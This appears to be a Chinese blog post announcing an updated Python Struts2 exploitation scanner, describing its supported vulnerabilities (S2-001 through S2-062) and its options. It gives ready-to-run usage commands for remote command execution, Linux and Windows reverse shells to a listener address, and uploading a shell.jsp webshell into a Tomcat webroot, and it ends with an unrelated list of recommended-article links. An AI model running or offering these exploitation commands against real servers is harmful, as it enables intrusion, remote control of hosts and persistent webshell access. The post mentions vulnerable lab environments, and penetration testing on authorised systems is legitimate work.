python扫描工具更新2022-4-16

1.添加了S2-062漏洞利用
其实是对S2-061漏洞的绕过
支持命令执行,Linux反弹shell,windows反弹shell。
2.解决了了Windows反弹shell的功能
底层原理:解决了有效负载Runtime.getRuntime().exec()执行复杂windows命令
不成功的问题。
详情文章:https://www.yuque.com/docs/share/0abe4b7e-45fd-4902-a23a-ad51ab72cbb9?# 《使用java命令执行函数反弹windows-shell》

工具地址https://github.com/Vancomycin-g/Struts2Scan/
里面有两个工具,一个是python编写的工具,另一个是jar文件
python工具是改变大佬的。jar文件是在网络上找的。

java工具

优点

1.扫描比较稳定
2.误报情况少,
3.可视化,方便操作

缺点

1.无法指定payload进行利用
2.无法反弹shell
3.无S2-061 payload

用法

直接一键扫描就行了,简单粗暴

python工具

优点

1.大多payload支持Linux反弹shell,少部分payload支持windows反弹shell
2.可以自己选可以使用的payload.
3.有S2-061 payload

缺点

1.稳定性优化的还可以,可能存在误报情况,
2.有许多命令参数。

工具介绍

原作者:github地址:https://github.com/HatBoy/Struts2-Scan
感谢原作者开源的工具
此次是在原有的基础上进行升级,优化。
升级内容:

1.添加了S2-061漏洞
2.优化了误报情况。
3.个别添加了windows反弹shell功能。
4.原来参数-r ip:port修改成了,
-lr ip:port 反弹Linuxshell
-wr ip:port反弹Windows shell
5.还有其他细微的地方

Struts2-Scan

  • Struts2漏洞利用扫描工具,基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057,S2-061,S2-062
  • 支持单个URL漏洞检测和批量URL检测,指定漏洞利用,可获取WEB路径,执行命令,反弹shell和上传文件,注意,并不是所有的漏洞均支持上述功能,只有部分功能支持

运行环境

  • Python3.6.X及其以上版本
  • 第三方库: click, requests, bs4
  • 测试环境: Ubuntu 16.04
  • 漏洞环境已上传,参考地址:
    • https://github.com/Medicean/VulApps/tree/master/s/struts2/
    • https://github.com/vulhub/vulhub/tree/master/struts2

工具参数说明

Usage: Struts2Scan.py [OPTIONS]Struts2批量扫描利用工具Options:-i, --info          漏洞信息介绍-v, --version       显示工具版本-u, --url TEXT      URL地址-n, --name TEXT     指定漏洞名称, 漏洞名称详见info-f, --file TEXT     批量扫描URL文件, 一行一个URL-d, --data TEXT     POST参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}-c, --encode TEXT   页面编码, 默认UTF-8编码-p, --proxy TEXT    HTTP代理. 格式为http://ip:port-t, --timeout TEXT  HTTP超时时间, 默认10s-w, --workers TEXT  批量扫描进程数, 默认为10个进程--header TEXT       HTTP请求头, 格式为: key1=value1&key2=value2-e, --exec          进入命令执行shell--webpath           获取WEB路径-lr, --Linux_reverse TEXT  反弹Linux shell地址, 格式为ip:port-wr, --Win_reverse TEXT  反弹Windows shell地址, 格式为ip:port--upfile TEXT       需要上传的文件路径和名称--uppath TEXT       上传的目录和名称, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp-q, --quiet         关闭打印不存在漏洞的输出,只保留存在漏洞的输出-h, --help          Show this message and exit.

使用例子

查看漏洞详细信息:

$ python3 Struts2Scan.py --info

单个URL漏洞检测:

$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action

批量漏洞检测:

$ python3 Struts2Scan.py -f urls.txt

指定POST数据:

$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -d name=admin&email=admin&age={exp}

常用方法

# 命令执行
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016  -e# 反弹Linux shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 -lr 192.168.100.8:8888# 反弹Windows shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 -wr 192.168.100.8:8888# 上传shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp

struts2综合漏洞扫描工具相关推荐

  1. 漏洞扫描工具_Vulmap漏洞扫描工具

    本文来源于https://github.com/zhzyker/vulmap 已与作者联系 作者同意发送本文章 Vulmap目前支持以下漏洞 +-------------------+-------- ...

  2. Netsparker超轻量级Web安全漏洞扫描工具使用教程介绍

    有特征 此工具分为收费版本和绿色版本 绿色版本也是很强大的 一 .Netsparker工具简介 Netsparker是一款综合型的web应用安全漏洞扫描工具,它分为专业版和免费版,免费版的功能也比较强 ...

  3. 漏洞扫描工具Vulmap

    Vulmap是一款漏洞扫描工具, 可对Web容器.Web服务器.Web中间件以及CMS等Web程序进行漏洞扫描, 并且具备漏洞利用功能.相关测试人员可以使用vulmap检测目标是否存在特定漏洞, 并且 ...

  4. 常见漏洞扫描工具AWVS、AppScan、Nessus的使用

    HVV笔记--常见漏洞扫描工具AWVS.AppScan.Nessus的使用 1 AWVS 1.1 安装部署 1.2 激活 1.3 登录 1.4 扫描web应用程序 1.4.1 需要账户密码登录的扫描 ...

  5. java web 漏洞扫描工具_java编写web漏洞扫描系列 一、GET/POST

    今天是java编写漏洞扫描工具系列一,在整个系列中我将以案例驱动方式进行,从基本的请求,到常规漏洞扫描,Burp插件,调用SQLmap api,整合burp+sqlmap(Web平台),漏洞扫描平台( ...

  6. 渗透测试常用WEB安全漏洞扫描工具集合

    渗透测试阶段信息收集完成后,需根据所收集的信息,扫描目标站点可能存在的漏洞,包括SQL注入漏洞.跨站脚本漏洞.文件上传漏洞.文件包含漏洞及命令执行漏洞等,然后通过这些已知的漏洞,寻找目标站点存在攻击的 ...

  7. vulmap——漏洞扫描工具简介与使用教程

    一.工具简介 vulmap是一款漏洞扫描工具, 可对Web容器.Web服务器.Web中间件以及CMS等Web程序进行漏洞扫描, 并且具备漏洞利用功能. 相关测试人员可以使用vulmap检测目标是否存在 ...

  8. 网站漏洞扫描工具Uniscan

    网站漏洞扫描工具Uniscan 网站漏洞的种类有很多种,如何快速扫描寻找漏洞,是渗透测试人员面临的一个棘手问题.Uniscan是Kali Linux预先安装的一个网站漏洞扫描工具.该工具可以针对单一. ...

  9. WordPress漏洞扫描工具WPScan

    WordPress漏洞扫描工具WPScan WordPress是主流的PHP网站模版,以构建博客而闻名.WordPress可以通过安装插件和主题的方式扩展功能,这也带来的安全隐患.WordPress是 ...

最新文章

  1. 斐波那契数列的实现(简单递归和动态规划)
  2. MFC类中获得其它类指针
  3. 微型计算机的层次结构,计算机系统层次结构微程序级
  4. Linux网络流量实时监控工具-ifstat
  5. Visual Entity 手册(十一)代码生成设置
  6. DVWA通关教程(中)
  7. avalon框架,简单的MVVM
  8. android jni 中jnienv,android JNI中JNIEnv類型和jobject類型的解釋
  9. ORA-14551: 无法在查询中执行 DML 操作
  10. 智能化连锁门店解决方案
  11. 数据结构上机实践第11周项目1 - 图基本算法库
  12. linux 网络编程 ------------TCP多进程并发服务器
  13. Android Multimedia框架总结(二十三)MediaCodec补充及MediaMuxer引入(附案例)
  14. dnf手游体验服显示无法连接服务器,《DNF手游》体验服服务器人数上限怎么办 体验服服务器人数上限解决办法...
  15. android信鸽推送demo_android app 集成 信鸽推送
  16. 《SolidWorks 2014中文版完全自学手册》——导读
  17. golang调用sdl2,键盘和鼠标事件
  18. 实战案例分享:我用 Python 预测房价走势
  19. 51单片机入门学习篇-led灯、按键、数码管、中断
  20. TensorFlow2 -官方教程 :保存和恢复模型

热门文章

  1. Linux系统MySQL如何导入数据库
  2. 同事天天写垃圾代码,就没办法?
  3. python annotate函数_Python Matplotlib.pyplot.annotate()用法及代码示例
  4. 【Bedtime Story】希尔伯特第十问题与图灵机
  5. 纯内网环境中k8s下onlyOffice启用https
  6. 解除移动/联通网络锁定的方法
  7. QQ无法安装 系统时间问题
  8. 新买的Sony双层可擦写蓝光刻录碟,…
  9. 虚拟机centos7的克隆
  10. 3D打印机DIY(二)X轴与Z轴安装